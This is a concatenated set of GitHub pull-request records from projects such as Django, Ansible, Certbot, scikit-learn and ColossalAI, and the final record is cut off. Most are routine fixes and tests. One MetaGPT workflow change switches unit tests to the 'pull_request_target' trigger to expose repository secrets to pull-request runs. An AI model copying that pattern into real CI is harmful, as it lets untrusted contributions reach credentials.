diff --git a/test/integration/targets/no_log/runme.sh b/test/integration/targets/no_log/runme.sh
index 474e755e13d472..bb5c048fc9ab3f 100755
--- a/test/integration/targets/no_log/runme.sh
+++ b/test/integration/targets/no_log/runme.sh
@@ -13,3 +13,9 @@ set -eux
# no log disabled, should produce 0 censored
[ "$(ansible-playbook dynamic.yml -i ../../inventory -vvvvv "$@" -e unsafe_show_logs=yes|grep -c 'output has been hidden')" = "0" ]
+
+# test no log for sub options
+[ "$(ansible-playbook no_log_suboptions.yml -i ../../inventory -vvvvv "$@" | grep -Ec '(MANPOWER|UNTAPPED|CONCERNED|MARLIN|FLICK)')" = "0" ]
+
+# test invalid data passed to a suboption
+[ "$(ansible-playbook no_log_suboptions_invalid.yml -i ../../inventory -vvvvv "$@" | grep -Ec '(SUPREME|IDIOM|MOCKUP|EDUCATED|FOOTREST|CRAFTY|FELINE|CRYSTAL|EXPECTANT|AGROUND|GOLIATH|FREEFALL)')" = "0" ]
| ##### SUMMARY
<!--- Describe the change below, including rationale and design decisions -->
Backport of #63405 for Ansible 2.7
(cherry picked from commit e9d29b1fe4)
This isn't a straight backport since the function for the original fix is in `basic.py` in this branch.
<!--- HINT: Include "Fixes #nnn" if you are fixing an existing issue -->
##### ISSUE TYPE
<!--- Pick one below and delete the rest -->
- Bugfix Pull Request
##### COMPONENT NAME
<!--- Write the short name of the module, plugin, task or feature below -->
`lib/ansible/module_utils/basic.py` | https://api.github.com/repos/ansible/ansible/pulls/63470 | 2019-10-14T16:49:21Z | 2019-10-14T22:31:16Z | 2019-10-14T22:31:16Z | 2019-11-13T20:01:31Z | 2,199 | ansible/ansible | 49,009 |
Fixed #31340 -- Allowed query expressions in SearchQuery.value and __search lookup. | diff --git a/django/contrib/postgres/search.py b/django/contrib/postgres/search.py
index 90b6823575423..2b2ae0c321b2d 100644
--- a/django/contrib/postgres/search.py
+++ b/django/contrib/postgres/search.py
@@ -11,7 +11,7 @@ class SearchVectorExact(Lookup):
lookup_name = 'exact'
def process_rhs(self, qn, connection):
- if not hasattr(self.rhs, 'resolve_expression'):
+ if not isinstance(self.rhs, (SearchQuery, CombinedSearchQuery)):
config = getattr(self.lhs, 'config', None)
self.rhs = SearchQuery(self.rhs, config=config)
rhs, rhs_params = super().process_rhs(qn, connection)
@@ -170,7 +170,8 @@ def __init__(self, value, output_field=None, *, config=None, invert=False, searc
self.function = self.SEARCH_TYPES.get(search_type)
if self.function is None:
raise ValueError("Unknown search_type argument '%s'." % search_type)
- value = Value(value)
+ if not hasattr(value, 'resolve_expression'):
+ value = Value(value)
expressions = (value,)
self.config = SearchConfig.from_parameter(config)
if self.config is not None:
diff --git a/docs/ref/contrib/postgres/search.txt b/docs/ref/contrib/postgres/search.txt
index 949d95929e558..65d54cfd8dd18 100644
--- a/docs/ref/contrib/postgres/search.txt
+++ b/docs/ref/contrib/postgres/search.txt
@@ -35,6 +35,10 @@ query and the vector.
To use the ``search`` lookup, ``'django.contrib.postgres'`` must be in your
:setting:`INSTALLED_APPS`.
+.. versionchanged:: 3.1
+
+ Support for query expressions was added.
+
``SearchVector``
================
@@ -108,7 +112,8 @@ See :ref:`postgresql-fts-search-configuration` for an explanation of the
.. versionchanged:: 3.1
- Support for ``'websearch'`` search type was added.
+ Support for ``'websearch'`` search type and query expressions in
+ ``SearchQuery.value`` were added.
``SearchRank``
==============
diff --git a/docs/releases/3.1.txt b/docs/releases/3.1.txt
index 278752db90c5f..de66d7805f72d 100644
--- a/docs/releases/3.1.txt
+++ b/docs/releases/3.1.txt
@@ -113,9 +113,14 @@ Minor features
* :class:`~django.contrib.postgres.search.SearchQuery` now supports
``'websearch'`` search type on PostgreSQL 11+.
+* :class:`SearchQuery.value <django.contrib.postgres.search.SearchQuery>` now
+ supports query expressions.
+
* The new :class:`~django.contrib.postgres.search.SearchHeadline` class allows
highlighting search results.
+* :lookup:`search` lookup now supports query expressions.
+
:mod:`django.contrib.redirects`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
diff --git a/tests/postgres_tests/migrations/0002_create_test_models.py b/tests/postgres_tests/migrations/0002_create_test_models.py
index 12d94e348a21d..ee1463e1eb7f4 100644
--- a/tests/postgres_tests/migrations/0002_create_test_models.py
+++ b/tests/postgres_tests/migrations/0002_create_test_models.py
@@ -185,6 +185,17 @@ class Migration(migrations.Migration):
},
bases=None,
),
+ migrations.CreateModel(
+ name='LineSavedSearch',
+ fields=[
+ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
+ ('line', models.ForeignKey('postgres_tests.Line', on_delete=models.CASCADE)),
+ ('query', models.CharField(max_length=100)),
+ ],
+ options={
+ 'required_db_vendor': 'postgresql',
+ },
+ ),
migrations.CreateModel(
name='AggregateTestModel',
fields=[
diff --git a/tests/postgres_tests/models.py b/tests/postgres_tests/models.py
index 8528c59da1c06..e803c989e07a0 100644
--- a/tests/postgres_tests/models.py
+++ b/tests/postgres_tests/models.py
@@ -139,6 +139,11 @@ def __str__(self):
return self.dialogue or ''
+class LineSavedSearch(PostgreSQLModel):
+ line = models.ForeignKey('Line', models.CASCADE)
+ query = models.CharField(max_length=100)
+
+
class RangesModel(PostgreSQLModel):
ints = IntegerRangeField(blank=True, null=True)
bigints = BigIntegerRangeField(blank=True, null=True)
diff --git a/tests/postgres_tests/test_search.py b/tests/postgres_tests/test_search.py
index 0e836e896b726..b40d6729201d8 100644
--- a/tests/postgres_tests/test_search.py
+++ b/tests/postgres_tests/test_search.py
@@ -10,7 +10,7 @@
from django.test import modify_settings, skipUnlessDBFeature
from . import PostgreSQLSimpleTestCase, PostgreSQLTestCase
-from .models import Character, Line, Scene
+from .models import Character, Line, LineSavedSearch, Scene
try:
from django.contrib.postgres.search import (
@@ -110,6 +110,18 @@ def test_search_query_config(self):
)
self.assertSequenceEqual(searched, [self.verse2])
+ def test_search_with_F_expression(self):
+ # Non-matching query.
+ LineSavedSearch.objects.create(line=self.verse1, query='hearts')
+ # Matching query.
+ match = LineSavedSearch.objects.create(line=self.verse1, query='elbows')
+ for query_expression in [F('query'), SearchQuery(F('query'))]:
+ with self.subTest(query_expression):
+ searched = LineSavedSearch.objects.filter(
+ line__dialogue__search=query_expression,
+ )
+ self.assertSequenceEqual(searched, [match])
+
@modify_settings(INSTALLED_APPS={'append': 'django.contrib.postgres'})
class SearchVectorFieldTest(GrailTestData, PostgreSQLTestCase):
| ticket-31340 | https://api.github.com/repos/django/django/pulls/12525 | 2020-03-04T13:36:58Z | 2020-03-16T11:27:27Z | 2020-03-16T11:27:27Z | 2020-03-16T11:27:27Z | 1,391 | django/django | 51,149 |
Fixed #32296 -- Added --skip-checks option to runserver command. | diff --git a/django/core/management/commands/runserver.py b/django/core/management/commands/runserver.py
index d9fb0883500ac..1e8f4d3b25577 100644
--- a/django/core/management/commands/runserver.py
+++ b/django/core/management/commands/runserver.py
@@ -51,6 +51,10 @@ def add_arguments(self, parser):
'--noreload', action='store_false', dest='use_reloader',
help='Tells Django to NOT use the auto-reloader.',
)
+ parser.add_argument(
+ '--skip-checks', action='store_true',
+ help='Skip system checks.',
+ )
def execute(self, *args, **options):
if options['no_color']:
@@ -114,8 +118,9 @@ def inner_run(self, *args, **options):
shutdown_message = options.get('shutdown_message', '')
quit_command = 'CTRL-BREAK' if sys.platform == 'win32' else 'CONTROL-C'
- self.stdout.write("Performing system checks...\n\n")
- self.check(display_num_errors=True)
+ if not options['skip_checks']:
+ self.stdout.write('Performing system checks...\n\n')
+ self.check(display_num_errors=True)
# Need to check migrations here, so can't use the
# requires_migrations_check attribute.
self.check_migrations()
diff --git a/docs/ref/django-admin.txt b/docs/ref/django-admin.txt
index b7f6e175be84b..2dcd8604003af 100644
--- a/docs/ref/django-admin.txt
+++ b/docs/ref/django-admin.txt
@@ -968,7 +968,8 @@ more robust change detection, and a reduction in power usage. Django supports
When you start the server, and each time you change Python code while the
server is running, the system check framework will check your entire Django
project for some common errors (see the :djadmin:`check` command). If any
-errors are found, they will be printed to standard output.
+errors are found, they will be printed to standard output. You can use the
+``--skip-checks`` option to skip running system checks.
You can run as many concurrent servers as you want, as long as they're on
separate ports by executing ``django-admin runserver`` more than once.
@@ -1006,6 +1007,10 @@ multithreaded by default.
Uses IPv6 for the development server. This changes the default IP address from
``127.0.0.1`` to ``::1``.
+.. versionchanged:: 4.0
+
+ Support for the ``--skip-checks`` option was added.
+
Examples of using different ports and addresses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
diff --git a/docs/releases/4.0.txt b/docs/releases/4.0.txt
index 52531c1266658..ed991fb67293e 100644
--- a/docs/releases/4.0.txt
+++ b/docs/releases/4.0.txt
@@ -153,7 +153,8 @@ Logging
Management Commands
~~~~~~~~~~~~~~~~~~~
-* ...
+* The :djadmin:`runserver` management command now supports the
+ :option:`--skip-checks` option.
Migrations
~~~~~~~~~~
diff --git a/tests/admin_scripts/tests.py b/tests/admin_scripts/tests.py
index d9ec07a3e34c4..fd94d4919f763 100644
--- a/tests/admin_scripts/tests.py
+++ b/tests/admin_scripts/tests.py
@@ -1313,6 +1313,29 @@ def test_readonly_database(self):
# You have # ...
self.assertIn('unapplied migration(s)', self.output.getvalue())
+ @mock.patch('django.core.management.commands.runserver.run')
+ @mock.patch('django.core.management.base.BaseCommand.check_migrations')
+ @mock.patch('django.core.management.base.BaseCommand.check')
+ def test_skip_checks(self, mocked_check, *mocked_objects):
+ call_command(
+ 'runserver',
+ use_reloader=False,
+ skip_checks=True,
+ stdout=self.output,
+ )
+ self.assertNotIn('Performing system checks...', self.output.getvalue())
+ mocked_check.assert_not_called()
+
+ self.output.truncate(0)
+ call_command(
+ 'runserver',
+ use_reloader=False,
+ skip_checks=False,
+ stdout=self.output,
+ )
+ self.assertIn('Performing system checks...', self.output.getvalue())
+ mocked_check.assert_called()
+
class ManageRunserverMigrationWarning(TestCase):
diff --git a/tests/utils_tests/test_autoreload.py b/tests/utils_tests/test_autoreload.py
index a43d7c2fded23..64bbcda27a1f5 100644
--- a/tests/utils_tests/test_autoreload.py
+++ b/tests/utils_tests/test_autoreload.py
@@ -98,8 +98,11 @@ def test_check_errors_catches_all_exceptions(self):
filename = self.temporary_file('test_exception.py')
filename.write_text('raise Exception')
with extend_sys_path(str(filename.parent)):
- with self.assertRaises(Exception):
- autoreload.check_errors(import_module)('test_exception')
+ try:
+ with self.assertRaises(Exception):
+ autoreload.check_errors(import_module)('test_exception')
+ finally:
+ autoreload._exception = None
self.assertFileFound(filename)
def test_zip_reload(self):
| https://code.djangoproject.com/ticket/32296 | https://api.github.com/repos/django/django/pulls/13809 | 2020-12-24T15:31:35Z | 2021-01-18T19:08:04Z | 2021-01-18T19:08:04Z | 2021-01-18T19:08:04Z | 1,206 | django/django | 50,925 |
Added a Solution using Euclidean Algo | diff --git a/Project Euler/Problem 05/sol2.py b/Project Euler/Problem 05/sol2.py
new file mode 100644
index 000000000000..cd11437f30db
--- /dev/null
+++ b/Project Euler/Problem 05/sol2.py
@@ -0,0 +1,20 @@
+#!/bin/python3
+'''
+Problem:
+2520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.
+What is the smallest positive number that is evenly divisible(divisible with no remainder) by all of the numbers from 1 to N?
+'''
+
+""" Euclidean GCD Algorithm """
+def gcd(x,y):
+ return x if y==0 else gcd(y,x%y)
+
+""" Using the property lcm*gcd of two numbers = product of them """
+def lcm(x,y):
+ return (x*y)//gcd(x,y)
+
+n = int(input())
+g=1
+for i in range(1,n+1):
+ g=lcm(g,i)
+print(g)
diff --git a/Project Euler/Problem 9/sol2.py b/Project Euler/Problem 9/sol2.py
new file mode 100644
index 000000000000..13674d25875e
--- /dev/null
+++ b/Project Euler/Problem 9/sol2.py
@@ -0,0 +1,19 @@
+"""A Pythagorean triplet is a set of three natural numbers, for which,
+a^2+b^2=c^2
+Given N, Check if there exists any Pythagorean triplet for which a+b+c=N
+Find maximum possible value of product of a,b,c among all such Pythagorean triplets, If there is no such Pythagorean triplet print -1."""
+#!/bin/python3
+import sys
+
+product=-1
+d=0
+N = int(input())
+for a in range(1,N//3):
+ """Solving the two equations a**2+b**2=c**2 and a+b+c=N eliminating c """
+ b=(N*N-2*a*N)//(2*N-2*a)
+ c=N-a-b
+ if c*c==(a*a+b*b):
+ d=(a*b*c)
+ if d>=product:
+ product=d
+print(product)
| https://api.github.com/repos/TheAlgorithms/Python/pulls/277 | 2018-03-22T14:00:59Z | 2018-03-23T12:54:10Z | 2018-03-23T12:54:10Z | 2018-04-15T13:46:46Z | 524 | TheAlgorithms/Python | 29,784 |
|
Print out line diff on test failure | diff --git a/tests/util.py b/tests/util.py
index 84e98bb0fbd..8755111f7c5 100644
--- a/tests/util.py
+++ b/tests/util.py
@@ -9,7 +9,7 @@
import black
from black.debug import DebugVisitor
from black.mode import TargetVersion
-from black.output import err, out
+from black.output import diff, err, out
THIS_DIR = Path(__file__).parent
DATA_DIR = THIS_DIR / "data"
@@ -47,6 +47,9 @@ def _assert_format_equal(expected: str, actual: str) -> None:
except Exception as ve:
err(str(ve))
+ if actual != expected:
+ out(diff(expected, actual, "expected", "actual"))
+
assert actual == expected
| ### Description
It currently prints both ASTs - this change also adds the line diff, making it much easier to visualize the changes. It's not too verbose since it's only a diff.
Especially useful if the test file is long (and the ASTs are big)
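
Black uses its own `black.output.diff` helper for this (as imported in the patch above); as a rough standalone illustration of the idea, not the code added by this PR, a unified line diff of expected vs. actual might look like:

```python
# A unified line diff makes it obvious where expected and actual formatting
# diverge, without dumping whole ASTs.
import difflib

expected = "def f(a, b):\n    return a + b\n"
actual = "def f(a,b):\n    return a+b\n"

print("".join(difflib.unified_diff(
    expected.splitlines(keepends=True),
    actual.splitlines(keepends=True),
    fromfile="expected",
    tofile="actual",
)))
```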
### Checklist - did you ...
- [x ] Add a CHANGELOG entry if necessary? (should not be necessary for this)
- [x ] Add / update tests if necessary?
- [x ] Add new / update outdated documentation? | https://api.github.com/repos/psf/black/pulls/2552 | 2021-10-21T05:23:21Z | 2021-10-27T14:37:20Z | 2021-10-27T14:37:20Z | 2021-10-27T17:47:03Z | 178 | psf/black | 24,582 |
Add Tenor to sites list | diff --git a/sherlock/resources/data.json b/sherlock/resources/data.json
index 03a5405ab..2df5d15e7 100644
--- a/sherlock/resources/data.json
+++ b/sherlock/resources/data.json
@@ -1443,6 +1443,14 @@
"username_claimed": "blue",
"username_unclaimed": "noonewouldeverusethis7"
},
+ "Tenor": {
+ "errorType": "status_code",
+ "regexCheck": "^[A-Za-z0-9_]{2,32}$",
+ "url": "https://tenor.com/users/{}",
+ "urlMain": "https://tenor.com/",
+ "username_claimed": "red",
+ "username_unclaimed": "impossible-username"
+ },
"TikTok": {
"errorType": "status_code",
"url": "https://tiktok.com/@{}",
diff --git a/sites.md b/sites.md
index 756bc7172..dbd9d87f2 100644
--- a/sites.md
+++ b/sites.md
@@ -1,4 +1,4 @@
-## List Of Supported Sites (284 Sites In Total!)
+## List Of Supported Sites (285 Sites In Total!)
1. [2Dimensions](https://2Dimensions.com/)
1. [3dnews](http://forum.3dnews.ru/)
1. [7Cups](https://www.7cups.com/)
@@ -188,6 +188,7 @@
1. [TETR.IO](https://tetr.io)
1. [Telegram](https://t.me/)
1. [Tellonym.me](https://tellonym.me/)
+1. [Tenor](https://tenor.com/)
1. [TikTok](https://tiktok.com/)
1. [Tinder](https://tinder.com/)
1. [TrackmaniaLadder](http://en.tm-ladder.com/index.php)
| Adds support for [Tenor](https://tenor.com/). | https://api.github.com/repos/sherlock-project/sherlock/pulls/1137 | 2021-09-19T17:19:49Z | 2021-10-27T18:28:08Z | 2021-10-27T18:28:08Z | 2021-10-27T18:47:15Z | 445 | sherlock-project/sherlock | 36,604 |
Make coveralls dependent on the TOXENV variable being "cover" | diff --git a/.travis.yml b/.travis.yml
index d790e94f9e8..b39d603ee44 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -10,7 +10,7 @@ install:
script: travis_retry tox
-after_success: coveralls
+after_success: '[ "$TOXENV" == "cover" ] && coveralls'
env:
- TOXENV=py26
| This one-liner stops `coveralls` from running except when the env variable is set to 'cover'. This should resolve issue #253.
The travis build works, and all the sub-builds are 0.00s (meaning they skipped):
https://travis-ci.org/letsencrypt/lets-encrypt-preview/builds/52059686
| https://api.github.com/repos/certbot/certbot/pulls/264 | 2015-02-24T23:07:28Z | 2015-02-25T00:10:13Z | 2015-02-25T00:10:13Z | 2016-05-06T19:21:59Z | 106 | certbot/certbot | 2,039 |
When permissions don't work (maybe you're root), disable a unit test that assumes permissions work | diff --git a/letsencrypt/plugins/webroot_test.py b/letsencrypt/plugins/webroot_test.py
index 9f5b6bba8ef..defe9396bea 100644
--- a/letsencrypt/plugins/webroot_test.py
+++ b/letsencrypt/plugins/webroot_test.py
@@ -66,8 +66,16 @@ def test_prepare_full_root_exists(self):
def test_prepare_reraises_other_errors(self):
self.auth.full_path = os.path.join(self.path, "null")
+ permission_canary = os.path.join(self.path, "rnd")
+ with open(permission_canary, "w") as f:
+ f.write("thingimy")
os.chmod(self.path, 0o000)
- self.assertRaises(errors.PluginError, self.auth.prepare)
+ try:
+ open(permission_canary, "r")
+ print "Warning, running tests as root skips permissions tests..."
+ except IOError:
+ # ok, permissions work, test away...
+ self.assertRaises(errors.PluginError, self.auth.prepare)
os.chmod(self.path, 0o700)
@mock.patch("letsencrypt.plugins.webroot.os.chown")
| Fixes: #1979
| https://api.github.com/repos/certbot/certbot/pulls/1980 | 2015-12-22T04:03:17Z | 2015-12-22T23:55:14Z | 2015-12-22T23:55:14Z | 2016-05-06T19:21:56Z | 257 | certbot/certbot | 1,172 |
Added OpenAssistant/oasst-rlhf-2-llama-30b-7k-steps | diff --git a/oasst-shared/oasst_shared/model_configs.py b/oasst-shared/oasst_shared/model_configs.py
index d676985e56..13b78e17bc 100644
--- a/oasst-shared/oasst_shared/model_configs.py
+++ b/oasst-shared/oasst_shared/model_configs.py
@@ -129,6 +129,11 @@ def compat_hash(self) -> str:
max_input_length=1024,
max_total_length=1792, # seeing OOMs on 2048 on an A100 80GB
),
+ "OA_RLHF_Llama_30B_2_7k": ModelConfig(
+ model_id="OpenAssistant/oasst-rlhf-2-llama-30b-7k-steps",
+ max_input_length=1024,
+ max_total_length=1792, # seeing OOMs on 2048 on an A100 80GB
+ ),
"Carper_RLHF_13B_1": ModelConfig(
model_id="CarperAI/vicuna-13b-fine-tuned-rlhf",
max_input_length=1024,
| https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/3063 | 2023-05-06T14:28:33Z | 2023-05-06T14:31:26Z | 2023-05-06T14:31:26Z | 2023-05-06T14:31:27Z | 260 | LAION-AI/Open-Assistant | 37,843 |
|
BUG: for several datasets, ``download_if_missing`` keyword was ignored. | diff --git a/sklearn/datasets/california_housing.py b/sklearn/datasets/california_housing.py
index c109fee6185d8..8a74ad9e60e35 100644
--- a/sklearn/datasets/california_housing.py
+++ b/sklearn/datasets/california_housing.py
@@ -87,8 +87,12 @@ def fetch_california_housing(data_home=None, download_if_missing=True):
data_home = get_data_home(data_home=data_home)
if not exists(data_home):
makedirs(data_home)
+
filepath = _pkl_filepath(data_home, TARGET_FILENAME)
if not exists(filepath):
+ if not download_if_missing:
+ raise IOError("Data not found and `download_if_missing` is False")
+
print('downloading Cal. housing from %s to %s' % (DATA_URL, data_home))
archive_fileobj = BytesIO(urlopen(DATA_URL).read())
fileobj = tarfile.open(
diff --git a/sklearn/datasets/covtype.py b/sklearn/datasets/covtype.py
index f7cb1ed03f36b..6e0b4d2d0d21c 100644
--- a/sklearn/datasets/covtype.py
+++ b/sklearn/datasets/covtype.py
@@ -99,6 +99,9 @@ def fetch_covtype(data_home=None, download_if_missing=True,
joblib.dump(X, samples_path, compress=9)
joblib.dump(y, targets_path, compress=9)
+ elif not available:
+ if not download_if_missing:
+ raise IOError("Data not found and `download_if_missing` is False")
try:
X, y
diff --git a/sklearn/datasets/kddcup99.py b/sklearn/datasets/kddcup99.py
index 824809a80edd6..03bf3f8d8fdef 100644
--- a/sklearn/datasets/kddcup99.py
+++ b/sklearn/datasets/kddcup99.py
@@ -345,6 +345,9 @@ def _fetch_brute_kddcup99(subset=None, data_home=None,
joblib.dump(X, samples_path, compress=0)
joblib.dump(y, targets_path, compress=0)
+ elif not available:
+ if not download_if_missing:
+ raise IOError("Data not found and `download_if_missing` is False")
try:
X, y
diff --git a/sklearn/datasets/olivetti_faces.py b/sklearn/datasets/olivetti_faces.py
index e74d65d60e18d..5f3af040dc1a4 100644
--- a/sklearn/datasets/olivetti_faces.py
+++ b/sklearn/datasets/olivetti_faces.py
@@ -111,6 +111,9 @@ def fetch_olivetti_faces(data_home=None, shuffle=False, random_state=0,
makedirs(data_home)
filepath = _pkl_filepath(data_home, TARGET_FILENAME)
if not exists(filepath):
+ if not download_if_missing:
+ raise IOError("Data not found and `download_if_missing` is False")
+
print('downloading Olivetti faces from %s to %s'
% (DATA_URL, data_home))
fhandle = urlopen(DATA_URL)
@@ -121,6 +124,7 @@ def fetch_olivetti_faces(data_home=None, shuffle=False, random_state=0,
del mfile
else:
faces = joblib.load(filepath)
+
# We want floating point data, but float32 is enough (there is only
# one byte of precision in the original uint8s anyway)
faces = np.float32(faces)
diff --git a/sklearn/datasets/species_distributions.py b/sklearn/datasets/species_distributions.py
index 6af36e6745d33..330c535620b7d 100644
--- a/sklearn/datasets/species_distributions.py
+++ b/sklearn/datasets/species_distributions.py
@@ -222,6 +222,9 @@ def fetch_species_distributions(data_home=None,
archive_path = _pkl_filepath(data_home, DATA_ARCHIVE_NAME)
if not exists(archive_path):
+ if not download_if_missing:
+ raise IOError("Data not found and `download_if_missing` is False")
+
print('Downloading species data from %s to %s' % (SAMPLES_URL,
data_home))
X = np.load(BytesIO(urlopen(SAMPLES_URL).read()))
diff --git a/sklearn/datasets/tests/test_covtype.py b/sklearn/datasets/tests/test_covtype.py
index f32511d7c9aa8..c980bb86fc870 100644
--- a/sklearn/datasets/tests/test_covtype.py
+++ b/sklearn/datasets/tests/test_covtype.py
@@ -3,7 +3,6 @@
Skipped if covtype is not already downloaded to data_home.
"""
-import errno
from sklearn.datasets import fetch_covtype
from sklearn.utils.testing import assert_equal, SkipTest
@@ -15,9 +14,8 @@ def fetch(*args, **kwargs):
def test_fetch():
try:
data1 = fetch(shuffle=True, random_state=42)
- except IOError as e:
- if e.errno == errno.ENOENT:
- raise SkipTest("Covertype dataset can not be loaded.")
+ except IOError:
+ raise SkipTest("Covertype dataset can not be loaded.")
data2 = fetch(shuffle=True, random_state=37)
diff --git a/sklearn/datasets/tests/test_kddcup99.py b/sklearn/datasets/tests/test_kddcup99.py
index 414c89763c1e8..498b98f4e67ed 100644
--- a/sklearn/datasets/tests/test_kddcup99.py
+++ b/sklearn/datasets/tests/test_kddcup99.py
@@ -5,7 +5,6 @@
scikit-learn data folder.
"""
-import errno
from sklearn.datasets import fetch_kddcup99
from sklearn.utils.testing import assert_equal, SkipTest
@@ -13,9 +12,8 @@
def test_percent10():
try:
data = fetch_kddcup99(download_if_missing=False)
- except IOError as e:
- if e.errno == errno.ENOENT:
- raise SkipTest("kddcup99 dataset can not be loaded.")
+ except IOError:
+ raise SkipTest("kddcup99 dataset can not be loaded.")
assert_equal(data.data.shape, (494021, 41))
assert_equal(data.target.shape, (494021,))
| Do what is promised in the docstring (raise an ``IOError``) if ``download_if_missing=False`` and the dataset wasn't previously downloaded. | https://api.github.com/repos/scikit-learn/scikit-learn/pulls/7944 | 2016-11-27T09:55:34Z | 2016-11-29T17:43:32Z | 2016-11-29T17:43:32Z | 2016-11-29T19:06:37Z | 1,477 | scikit-learn/scikit-learn | 46,274 |
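
As a hypothetical usage sketch of the scikit-learn ``download_if_missing`` behaviour described just above (illustrative only; if the dataset is already cached under ``data_home``, no error is raised):

```python
# fetch_california_housing is one of the fetchers affected by this change.
from sklearn.datasets import fetch_california_housing

try:
    housing = fetch_california_housing(download_if_missing=False)
except IOError:
    print("Dataset not cached locally and downloading is disabled.")
```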
bugfix: unittest secret | diff --git a/.github/workflows/unittest.yaml b/.github/workflows/unittest.yaml
index a8eb657ab..6b8edee81 100644
--- a/.github/workflows/unittest.yaml
+++ b/.github/workflows/unittest.yaml
@@ -2,11 +2,7 @@ name: Python application test
on:
workflow_dispatch:
- pull_request:
- branches:
- - 'main'
- - 'dev'
- - '*-release'
+ pull_request_target:
push:
branches:
- 'main'
@@ -56,5 +52,3 @@ jobs:
./tests/data/rsp_cache_new.json
retention-days: 3
if: ${{ always() }}
-
-
\ No newline at end of file
 | Support secrets in the PR unittest workflow. | https://api.github.com/repos/geekan/MetaGPT/pulls/698 | 2024-01-05T14:55:40Z | 2024-01-06T10:40:46Z | 2024-01-06T10:40:46Z | 2024-01-06T10:40:46Z | 175 | geekan/MetaGPT | 16,952 |
[workflow] updated release bdist workflow | diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 07452f4f398d..fa00a6a72c7c 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -14,7 +14,7 @@ jobs:
contains( github.event.pull_request.labels.*.name, 'Run Build and Test')
runs-on: [self-hosted, gpu]
container:
- image: hpcaitech/pytorch-cuda:1.10.1-11.3.0
+ image: hpcaitech/pytorch-cuda:1.12.0-11.3.0
options: --gpus all --rm -v /data/scratch/cifar-10:/data/scratch/cifar-10
timeout-minutes: 40
steps:
diff --git a/.github/workflows/release_bdist.yml b/.github/workflows/release_bdist.yml
index 2e5233d0a29c..7d5f9e731743 100644
--- a/.github/workflows/release_bdist.yml
+++ b/.github/workflows/release_bdist.yml
@@ -3,16 +3,15 @@ name: Release bdist wheel
on:
workflow_dispatch:
inputs:
+ torch_version:
+ type: string
+ description: torch version, separated by comma
+ required: true
+ default: "all"
cuda_version:
- type: choice
- description: CUDA Version
- default: 'all'
+ type: string
+ description: cuda version, separated by comma
required: true
- options:
- - all
- - "11.3"
- - "11.1"
- - "10.2"
github_ref:
type: string
description: Branch or Tag
@@ -27,12 +26,24 @@ jobs:
matrix: ${{ steps.set-matrix.outputs.matrix }}
steps:
- id: set-matrix
+ env:
+ TORCH_VERSIONS: ${{ inputs.torch_version }}
+ CUDA_VERSIONS: ${{ inputs.cuda_version }}
run: |
- [ "${{github.event.inputs.cuda_version}}" != "" ] && matrix="[\"hpcaitech/cuda-conda:${{github.event.inputs.cuda_version}}\"]"
- [ "${{github.event.inputs.cuda_version}}" == "" ] || [ "${{github.event.inputs.cuda_version}}" == "all" ] && \
- matrix="[\"hpcaitech/cuda-conda:11.3\", \"hpcaitech/cuda-conda:11.1\", \"hpcaitech/cuda-conda:10.2\"]"
- echo $matrix
- echo "::set-output name=matrix::{\"container\":$(echo $matrix)}"
+ echo $TORCH_VERSIONS
+ echo $CUDA_VERSIONS
+ IFS=','
+ DOCKER_IMAGE=()
+
+ for cv in $CUDA_VERSIONS
+ do
+ DOCKER_IMAGE+=("\"hpcaitech/cuda-conda:${cv}\"")
+ done
+
+ container=$( IFS=',' ; echo "${DOCKER_IMAGE[*]}" )
+ container="[${container}]"
+ echo "$container"
+ echo "::set-output name=matrix::{\"container\":$(echo "$container")}"
build:
name: Release bdist wheels
@@ -62,7 +73,9 @@ jobs:
- name: Build bdist wheel
run: |
pip install beautifulsoup4 requests packaging
- python ./build_colossalai_wheel.py
+ python ./build_colossalai_wheel.py --torch_version $TORCH_VERSIONS
+ env:
+ TORCH_VERSIONS: ${{ inputs.torch_version }}
- name: 🚀 Deploy
uses: garygrossgarten/github-action-scp@release
with:
diff --git a/.github/workflows/scripts/build_colossalai_wheel.py b/.github/workflows/scripts/build_colossalai_wheel.py
index dcedca73790c..2d33238e25de 100644
--- a/.github/workflows/scripts/build_colossalai_wheel.py
+++ b/.github/workflows/scripts/build_colossalai_wheel.py
@@ -15,6 +15,7 @@
def parse_args():
parser = argparse.ArgumentParser()
+ parser.add_argument('--torch_version', type=str)
parser.add_argument('--nightly', action='store_true',
help='whether this build is for nightly release, if True, will only build on the latest PyTorch version and Python 3.8')
return parser.parse_args()
@@ -81,29 +82,27 @@ def main():
args = parse_args()
wheel_info = all_wheel_info()
- if args.nightly:
- latest_torch_version = list(wheel_info.keys())
+ # filter wheels on condition
+ all_torch_versions = list(wheel_info.keys())
+ def _compare_version(a, b):
+ if version.parse(a) > version.parse(b):
+ return 1
+ else:
+ return -1
- def _compare_version(a, b):
- if version.parse(a) > version.parse(b):
- return 1
- else:
- return -1
+ all_torch_versions.sort(key=cmp_to_key(_compare_version))
- latest_torch_version.sort(key=cmp_to_key(_compare_version))
-
+ if args.nightly:
# only keep the latest version
- for key in latest_torch_version[:-1]:
+ for key in all_torch_versions[:-1]:
wheel_info.pop(key)
-
- # we only keep python 3.8 for nightly release
- for torch_version, cuda_versioned_info in wheel_info.items():
- for cuda_version, python_versioned_info in cuda_versioned_info.items():
- python_versions = list(python_versioned_info.keys())
-
- for key in python_versions:
- if key != '3.8':
- python_versioned_info.pop(key)
+ elif args.torch_version != 'all':
+ torch_versions = args.torch_version.split(',')
+ # only keep the torch versions specified
+ for key in all_torch_versions:
+ if key not in torch_versions:
+ wheel_info.pop(key)
+
build_colossalai(wheel_info)
if __name__ == '__main__':
 | Updated the binary distribution release workflow to support arbitrary inputs. Meanwhile, the default build workflow will use the latest PyTorch version. | https://api.github.com/repos/hpcaitech/ColossalAI/pulls/1318 | 2022-07-14T16:39:01Z | 2022-07-15T01:40:58Z | 2022-07-15T01:40:58Z | 2022-09-09T15:04:08Z | 1,407 | hpcaitech/ColossalAI | 11,641 |
Post-Release Cleanups | diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml
index 454acff30a..a8260fd087 100644
--- a/.github/workflows/main.yml
